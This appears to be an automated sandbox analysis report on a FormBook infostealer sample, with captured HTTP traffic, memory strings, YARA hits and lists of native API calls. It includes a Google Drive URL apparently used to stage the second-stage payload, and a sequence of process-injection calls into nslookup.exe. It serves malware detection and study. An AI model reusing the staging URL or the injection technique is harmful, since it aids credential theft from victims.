3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 11 Mar 2025 04:09:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 e0 0d 51 10 1c 2c 4b a5 49 45 a5 50 22 70 0e 1c dd da c8 55 4a 1c ec 0d 51 fe 1e 27 15 12 97 95 66 77 e6 69 96 5f 15 af 1b f9 51 97 f0 2c 5f 2a a8 9b a7 6a b7 81 d5 2d e2 ae 94 5b c4 42 16 97 4b c6 52 c4 72 bf 12 09 b7 f4 75 16 dc 1a a5 a3 a0 13 9d 8d c8 d3 1c f6 8e 60 eb 86 4e 73 bc 2c 13 8e 8b 89 1f 9c 9e e6 dc 9d f8 e7 89 2a e1 bd 90 d6 80 37 df 83 09 64 34 34 6f 15 8c 2a 40 17 59 9f 33 0b 5c 07 64 4f 01 82 f1 3f c6 33 8e fd 4c f2 71 28 ad bd 09 41 ac 7b 75 b4 06 33 96 b3 fb 0c ae 9b c3 d0 d1 70 03 ef 4b 00 14 c1 38 8e 6c 6a db f6 81 4d d1 49 01 6a e7 09 1e 53 8e 7f 88 d8 74 e9 18 0b cf bf 25 bf da 9e 2e 5a 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaMN0D'8Q,KIEP"pUJQ'fwi_Q,_*j-[BKRru`Ns,*7d44o*@Y3\dO?3Lq(A{u3pK8ljMIjSt%.Z0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 11 Mar 2025 04:09:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 e0 0d 51 10 1c 2c 4b a5 49 45 a5 50 22 70 0e 1c dd da c8 55 4a 1c ec 0d 51 fe 1e 27 15 12 97 95 66 77 e6 69 96 5f 15 af 1b f9 51 97 f0 2c 5f 2a a8 9b a7 6a b7 81 d5 2d e2 ae 94 5b c4 42 16 97 4b c6 52 c4 72 bf 12 09 b7 f4 75 16 dc 1a a5 a3 a0 13 9d 8d c8 d3 1c f6 8e 60 eb 86 4e 73 bc 2c 13 8e 8b 89 1f 9c 9e e6 dc 9d f8 e7 89 2a e1 bd 90 d6 80 37 df 83 09 64 34 34 6f 15 8c 2a 40 17 59 9f 33 0b 5c 07 64 4f 01 82 f1 3f c6 33 8e fd 4c f2 71 28 ad bd 09 41 ac 7b 75 b4 06 33 96 b3 fb 0c ae 9b c3 d0 d1 70 03 ef 4b 00 14 c1 38 8e 6c 6a db f6 81 4d d1 49 01 6a e7 09 1e 53 8e 7f 88 d8 74 e9 18 0b cf bf 25 bf da 9e 2e 5a 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaMN0D'8Q,KIEP"pUJQ'fwi_Q,_*j-[BKRru`Ns,*7d44o*@Y3\dO?3Lq(A{u3pK8ljMIjSt%.Z0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 11 Mar 2025 04:09:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 e0 0d 51 10 1c 2c 4b a5 49 45 a5 50 22 70 0e 1c dd da c8 55 4a 1c ec 0d 51 fe 1e 27 15 12 97 95 66 77 e6 69 96 5f 15 af 1b f9 51 97 f0 2c 5f 2a a8 9b a7 6a b7 81 d5 2d e2 ae 94 5b c4 42 16 97 4b c6 52 c4 72 bf 12 09 b7 f4 75 16 dc 1a a5 a3 a0 13 9d 8d c8 d3 1c f6 8e 60 eb 86 4e 73 bc 2c 13 8e 8b 89 1f 9c 9e e6 dc 9d f8 e7 89 2a e1 bd 90 d6 80 37 df 83 09 64 34 34 6f 15 8c 2a 40 17 59 9f 33 0b 5c 07 64 4f 01 82 f1 3f c6 33 8e fd 4c f2 71 28 ad bd 09 41 ac 7b 75 b4 06 33 96 b3 fb 0c ae 9b c3 d0 d1 70 03 ef 4b 00 14 c1 38 8e 6c 6a db f6 81 4d d1 49 01 6a e7 09 1e 53 8e 7f 88 d8 74 e9 18 0b cf bf 25 bf da 9e 2e 5a 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaMN0D'8Q,KIEP"pUJQ'fwi_Q,_*j-[BKRru`Ns,*7d44o*@Y3\dO?3Lq(A{u3pK8ljMIjSt%.Z0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 11 Mar 2025 04:09:51 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 278Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 6b 6b 6b 37 2e 79 61 63 68 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.ykkk7.yachts Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 04:10:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 04:10:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 04:10:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 4DttVpYJtB.exe, 00000002.00000002.396467057268.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 4DttVpYJtB.exe, 00000002.00000000.394939966585.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4DttVpYJtB.exe, 00000004.00000000.396464059030.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 4DttVpYJtB.exe, 00000004.00000001.396466730765.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: 4DttVpYJtB.exe, 00000004.00000001.396466730765.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006E77000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396747002398.00000000363C0000.00000004.00001000.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006EB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8
            Source: 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8I
            Source: 4DttVpYJtB.exe, 00000004.00000002.396735730426.0000000006E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8u
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EEC000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626749134.0000000006ED8000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396735895444.0000000006ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8&export=download
            Source: 4DttVpYJtB.exe, 00000004.00000003.396626749134.0000000006ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8&export=download0%
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8&export=download0T
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lu5o8nu4Af_mz0dyhgypeN1IoQWngwE8&export=downloadRT
            Source: 4DttVpYJtB.exe, 00000004.00000003.396590854812.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000002.396736019186.0000000006EF5000.00000004.00000020.00020000.00000000.sdmp, 4DttVpYJtB.exe, 00000004.00000003.396626241252.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/n
            Source: 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 4DttVpYJtB.exe, 00000004.00000003.396563187342.0000000006EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
            Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.30:49828 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.193:443 -> 192.168.11.30:49829 version: TLS 1.2
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00405809

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.400026261277.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400026547122.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396747563920.0000000036ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400025555468.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396748461817.0000000037D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.400027902000.0000000003420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370734E0 NtCreateMutant,LdrInitializeThunk,4_2_370734E0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_37072D10
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37073C30 NtOpenProcessToken,4_2_37073C30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37073C90 NtOpenThread,4_2_37073C90
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370738D0 NtGetContextThread,4_2_370738D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37074570 NtSuspendThread,4_2_37074570
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37074260 NtSetContextThread,4_2_37074260
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072F00 NtCreateFile,4_2_37072F00
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072F30 NtOpenDirectoryObject,4_2_37072F30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072FB0 NtSetValueKey,4_2_37072FB0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072E00 NtQueueApcThread,4_2_37072E00
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072E50 NtCreateSection,4_2_37072E50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072E80 NtCreateProcessEx,4_2_37072E80
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072EB0 NtProtectVirtualMemory,4_2_37072EB0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072EC0 NtQuerySection,4_2_37072EC0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072ED0 NtResumeThread,4_2_37072ED0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072D50 NtWriteVirtualMemory,4_2_37072D50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072DA0 NtReadVirtualMemory,4_2_37072DA0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072DC0 NtAdjustPrivilegesToken,4_2_37072DC0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072C10 NtOpenProcess,4_2_37072C10
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072C20 NtSetInformationFile,4_2_37072C20
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072C30 NtMapViewOfSection,4_2_37072C30
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072C50 NtUnmapViewOfSection,4_2_37072C50
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072CD0 NtEnumerateKey,4_2_37072CD0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072CF0 NtDelayExecution,4_2_37072CF0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072B00 NtQueryValueKey,4_2_37072B00
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072B10 NtAllocateVirtualMemory,4_2_37072B10
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072B20 NtQueryInformationProcess,4_2_37072B20
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072B80 NtCreateKey,4_2_37072B80
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072B90 NtFreeVirtualMemory,4_2_37072B90
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072BC0 NtQueryInformationToken,4_2_37072BC0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072BE0 NtQueryVirtualMemory,4_2_37072BE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072A10 NtWriteFile,4_2_37072A10
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072A80 NtClose,4_2_37072A80
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072AA0 NtQueryInformationFile,4_2_37072AA0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_37072AC0 NtEnumerateValueKey,4_2_37072AC0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370729D0 NtWaitForSingleObject,4_2_370729D0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370729F0 NtReadFile,4_2_370729F0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652BC0 NtQueryInformationToken,LdrInitializeThunk,6_2_03652BC0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652B80 NtCreateKey,LdrInitializeThunk,6_2_03652B80
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652B90 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03652B90
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652A10 NtWriteFile,LdrInitializeThunk,6_2_03652A10
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652A80 NtClose,LdrInitializeThunk,6_2_03652A80
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036529F0 NtReadFile,LdrInitializeThunk,6_2_036529F0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652F00 NtCreateFile,LdrInitializeThunk,6_2_03652F00
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652E50 NtCreateSection,LdrInitializeThunk,6_2_03652E50
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652D10 NtQuerySystemInformation,LdrInitializeThunk,6_2_03652D10
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652C30 NtMapViewOfSection,LdrInitializeThunk,6_2_03652C30
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652CF0 NtDelayExecution,LdrInitializeThunk,6_2_03652CF0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_036534E0 NtCreateMutant,LdrInitializeThunk,6_2_036534E0
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03654260 NtSetContextThread,6_2_03654260
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03654570 NtSuspendThread,6_2_03654570
            Source: C:\Windows\SysWOW64\nslookup.exeCode function: 6_2_03652B20 NtQueryInformationProcess,6_2_03652B20
